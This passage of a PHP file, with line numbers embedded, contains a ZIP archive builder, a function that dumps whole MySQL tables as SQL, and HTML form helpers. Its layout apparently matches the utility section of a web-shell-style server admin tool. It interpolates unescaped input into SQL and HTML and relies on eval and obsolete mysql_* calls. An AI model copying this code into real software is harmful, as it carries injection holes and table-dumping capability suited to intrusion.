4091 . '\x' . $dtime[4] . $dtime[5]
4092
4093 . '\x' . $dtime[2] . $dtime[3]
4094
4095 . '\x' . $dtime[0] . $dtime[1];
4096
4097 eval('$hexdtime = "' . $hexdtime . '";');
4098
4099 $fr = "\x50\x4b\x03\x04";
4100
4101 $fr .= "\x14\x00";
4102
4103 $fr .= "\x00\x00";
4104
4105 $fr .= "\x08\x00";
4106
4107 $fr .= $hexdtime;
4108
4109
4110
4111 $unc_len = strlen($data);
4112
4113 $crc = crc32($data);
4114
4115 $zdata = gzcompress($data);
4116
4117 $c_len = strlen($zdata);
4118
4119 $zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);
4120
4121 $fr .= pack('V', $crc);
4122
4123 $fr .= pack('V', $c_len);
4124
4125 $fr .= pack('V', $unc_len);
4126
4127 $fr .= pack('v', strlen($name));
4128
4129 $fr .= pack('v', 0);
4130
4131 $fr .= $name;
4132
4133 $fr .= $zdata;
4134
4135 $fr .= pack('V', $crc);
4136
4137 $fr .= pack('V', $c_len);
4138
4139 $fr .= pack('V', $unc_len);
4140
4141
4142
4143 $this -> datasec[] = $fr;
4144
4145 $new_offset = strlen(implode('', $this->datasec));
4146
4147
4148
4149 $cdrec = "\x50\x4b\x01\x02";
4150
4151 $cdrec .= "\x00\x00";
4152
4153 $cdrec .= "\x14\x00";
4154
4155 $cdrec .= "\x00\x00";
4156
4157 $cdrec .= "\x08\x00";
4158
4159 $cdrec .= $hexdtime;
4160
4161 $cdrec .= pack('V', $crc);
4162
4163 $cdrec .= pack('V', $c_len);
4164
4165 $cdrec .= pack('V', $unc_len);
4166
4167 $cdrec .= pack('v', strlen($name) );
4168
4169 $cdrec .= pack('v', 0 );
4170
4171 $cdrec .= pack('v', 0 );
4172
4173 $cdrec .= pack('v', 0 );
4174
4175 $cdrec .= pack('v', 0 );
4176
4177 $cdrec .= pack('V', 32 );
4178
4179 $cdrec .= pack('V', $this -> old_offset );
4180
4181 $this -> old_offset = $new_offset;
4182
4183 $cdrec .= $name;
4184
4185
4186
4187 $this -> ctrl_dir[] = $cdrec;
4188
4189 }
4190
4191
4192
4193 function file() {
4194
4195 $data = implode('', $this -> datasec);
4196
4197 $ctrldir = implode('', $this -> ctrl_dir);
4198
4199 return $data . $ctrldir . $this -> eof_ctrl_dir . pack('v', sizeof($this -> ctrl_dir)) . pack('v', sizeof($this -> ctrl_dir)) . pack('V', strlen($ctrldir)) . pack('V', strlen($data)) . "\x00\x00";
4200
4201 }
4202
4203}
4204
4205
4206
4207// Dump mysql
4208
4209function sqldumptable($table, $fp=0) {
4210
4211 $tabledump = "DROP TABLE IF EXISTS $table;\n";
4212
4213 $tabledump .= "CREATE TABLE $table (\n";
4214
4215
4216
4217 $firstfield=1;
4218
4219
4220
4221 $fields = q("SHOW FIELDS FROM $table");
4222
4223 while ($field = mysql_fetch_array($fields)) {
4224
4225 if (!$firstfield) {
4226
4227 $tabledump .= ",\n";
4228
4229 } else {
4230
4231 $firstfield=0;
4232
4233 }
4234
4235 $tabledump .= " $field[Field] $field[Type]";
4236
4237 if (!empty($field["Default"])) {
4238
4239 $tabledump .= " DEFAULT '$field[Default]'";
4240
4241 }
4242
4243 if ($field['Null'] != "YES") {
4244
4245 $tabledump .= " NOT NULL";
4246
4247 }
4248
4249 if ($field['Extra'] != "") {
4250
4251 $tabledump .= " $field[Extra]";
4252
4253 }
4254
4255 }
4256
4257 fr($fields);
4258
4259
4260
4261 $keys = q("SHOW KEYS FROM $table");
4262
4263 while ($key = mysql_fetch_array($keys)) {
4264
4265 $kname=$key['Key_name'];
4266
4267 if ($kname != "PRIMARY" && $key['Non_unique'] == 0) {
4268
4269 $kname="UNIQUE|$kname";
4270
4271 }
4272
4273 if(!is_array($index[$kname])) {
4274
4275 $index[$kname] = array();
4276
4277 }
4278
4279 $index[$kname][] = $key['Column_name'];
4280
4281 }
4282
4283 fr($keys);
4284
4285
4286
4287 while(list($kname, $columns) = @each($index)) {
4288
4289 $tabledump .= ",\n";
4290
4291 $colnames=implode($columns,",");
4292
4293
4294
4295 if ($kname == "PRIMARY") {
4296
4297 $tabledump .= " PRIMARY KEY ($colnames)";
4298
4299 } else {
4300
4301 if (substr($kname,0,6) == "UNIQUE") {
4302
4303 $kname=substr($kname,7);
4304
4305 }
4306
4307 $tabledump .= " KEY $kname ($colnames)";
4308
4309 }
4310
4311 }
4312
4313
4314
4315 $tabledump .= "\n);\n\n";
4316
4317 if ($fp) {
4318
4319 fwrite($fp,$tabledump);
4320
4321 } else {
4322
4323 echo $tabledump;
4324
4325 }
4326
4327
4328
4329 $rows = q("SELECT * FROM $table");
4330
4331 $numfields = mysql_num_fields($rows);
4332
4333 while ($row = mysql_fetch_array($rows)) {
4334
4335 $tabledump = "INSERT INTO $table VALUES(";
4336
4337
4338
4339 $fieldcounter=-1;
4340
4341 $firstfield=1;
4342
4343 while (++$fieldcounter<$numfields) {
4344
4345 if (!$firstfield) {
4346
4347 $tabledump.=", ";
4348
4349 } else {
4350
4351 $firstfield=0;
4352
4353 }
4354
4355
4356
4357 if (!isset($row[$fieldcounter])) {
4358
4359 $tabledump .= "NULL";
4360
4361 } else {
4362
4363 $tabledump .= "'".mysql_escape_string($row[$fieldcounter])."'";
4364
4365 }
4366
4367 }
4368
4369
4370
4371 $tabledump .= ");\n";
4372
4373
4374
4375 if ($fp) {
4376
4377 fwrite($fp,$tabledump);
4378
4379 } else {
4380
4381 echo $tabledump;
4382
4383 }
4384
4385 }
4386
4387 fr($rows);
4388
4389 if ($fp) {
4390
4391 fwrite($fp,"\n");
4392
4393 } else {
4394
4395 echo "\n";
4396
4397 }
4398
4399}
4400
4401
4402
4403function ue($str){
4404
4405 return urlencode($str);
4406
4407}
4408
4409
4410
4411function p($str){
4412
4413 echo $str."\n";
4414
4415}
4416
4417
4418
4419function tbhead() {
4420
4421 p('<table width="100%" border="0" cellpadding="4" cellspacing="0">');
4422
4423}
4424
4425function tbfoot(){
4426
4427 p('</table>');
4428
4429}
4430
4431
4432
4433function makehide($name,$value=''){
4434
4435 p("<input id=\"$name\" type=\"hidden\" name=\"$name\" value=\"$value\" />");
4436
4437}
4438
4439
4440
4441function makeinput($arg = array()){
4442
4443 $arg['size'] = $arg['size'] > 0 ? "size=\"$arg[size]\"" : "size=\"100\"";
4444
4445 $arg['extra'] = $arg['extra'] ? $arg['extra'] : '';
4446
4447 !$arg['type'] && $arg['type'] = 'text';
4448
4449 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
4450
4451 $arg['class'] = $arg['class'] ? $arg['class'] : 'input';
4452
4453 if ($arg['newline']) {
4454
4455 p("<p>$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] /></p>");
4456
4457 } else {
4458
4459 p("$arg[title]<input class=\"$arg[class]\" name=\"$arg[name]\" id=\"$arg[name]\" value=\"$arg[value]\" type=\"$arg[type]\" $arg[size] $arg[extra] />");
4460
4461 }
4462
4463}
4464
4465
4466
4467function makeselect($arg = array()){
4468
4469 if ($arg['onchange']) {
4470
4471 $onchange = 'onchange="'.$arg['onchange'].'"';
4472
4473 }
4474
4475 $arg['title'] = $arg['title'] ? $arg['title'] : '';
4476
4477 if ($arg['newline']) p('<p>');
4478
4479 p("$arg[title] <select class=\"input\" id=\"$arg[name]\" name=\"$arg[name]\" $onchange>");
4480
4481 if (is_array($arg['option'])) {
4482
4483 foreach ($arg['option'] as $key=>$value) {
4484
4485 if ($arg['selected']==$key) {
4486
4487 p("<option value=\"$key\" selected>$value</option>");
4488
4489 } else {
4490
4491 p("<option value=\"$key\">$value</option>");
4492
4493 }
4494
4495 }
4496
4497 }
4498
4499 p("</select>");
4500
4501 if ($arg['newline']) p('</p>');
4502
4503}
4504
4505function formhead($arg = array()) {
4506
4507 !$arg['method'] && $arg['method'] = 'post';
4508
4509 !$arg['action'] && $arg['action'] = $self;
4510
4511 $arg['target'] = $arg['target'] ? "target=\"$arg[target]\"" : '';
4512
4513 !$arg['name'] && $arg['name'] = 'form1';
4514
4515 p("<form name=\"$arg[name]\" id=\"$arg[name]\" action=\"$arg[action]\" method=\"$arg[method]\" $arg[target]>");
4516
4517 if ($arg['title']) {
4518
4519 p('<h2>'.$arg['title'].' »</h2>');
4520
4521 }
4522
4523}
4524
4525
4526
4527function maketext($arg = array()){
4528
4529 !$arg['cols'] && $arg['cols'] = 100;
4530
4531 !$arg['rows'] && $arg['rows'] = 25;
4532
4533 $arg['title'] = $arg['title'] ? $arg['title'].'<br />' : '';
4534
4535 p("<p>$arg[title]<textarea class=\"area\" id=\"$arg[name]\" name=\"$arg[name]\" cols=\"$arg[cols]\" rows=\"$arg[rows]\" $arg[extra]>$arg[value]</textarea></p>");
4536
4537}
4538
4539
4540
4541function formfooter($name = ''){
4542
4543 !$name && $name = 'submit';
4544
4545 p('<p><input class="bt" name="'.$name.'" id=\"'.$name.'\" type="submit" value="Submit"></p>');
4546
4547 p('</form>');
4548
4549}
4550
4551
4552
4553function formfoot(){
4554
4555 p('</form>');
4556
4557}
4558
4559
4560
4561// Exit
4562
4563function pr($a) {
4564
4565 echo '<pre>';
4566
4567 print_r($a);
4568
4569 echo '</pre>';
4570
4571}
4572
4573?